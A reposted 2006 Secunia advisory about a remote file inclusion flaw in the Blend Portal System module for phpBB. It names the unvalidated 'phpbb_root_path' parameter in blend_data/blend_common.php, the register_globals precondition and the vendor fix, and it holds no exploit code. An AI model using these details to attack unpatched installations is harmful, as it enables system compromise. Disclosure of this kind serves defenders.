phpBB Blend Portal System Module

Posted on Wednesday, May 31, 2006 @ 07:27:52 UTC in Security
by Raven

TITLE: phpBB Blend Portal System Module "phpbb_root_path" File Inclusion

SECUNIA ADVISORY ID: SA20350

VERIFY ADVISORY: http://secunia.com/advisories/20350/

CRITICAL: Highly critical

IMPACT: System access

WHERE: >From remote

SOFTWARE: Blend Portal System 1.x (module for phpBB)
http://secunia.com/product/10215/

DESCRIPTION: Mustafa Can Bjorn has reported a vulnerability in the Blend Portal System module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "phpbb_root_path" parameter in blend_data/blend_common.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been reported in version 1.2.0. Other versions may also be affected.

SOLUTION: Apply code changes as instructed by the vendor. http://phpbb-tweaks.com/topics.html-p-17623#17623

PROVIDED AND/OR DISCOVERED BY: Mustafa Can Bjorn

ORIGINAL ADVISORY: http://www.nukedx.com/?viewdoc=41
 
 
click Related        click Share
 
 
Associated Topics

PHPBB
 
News ©

Site Info

Last SeenLast Seen
  • neralex
  • nextgen
Server TrafficServer Traffic
  • Total: 481,643,973
  • Today: 11,275
Server InfoServer Info
  • Mar 29, 2024
  • 08:15 am UTC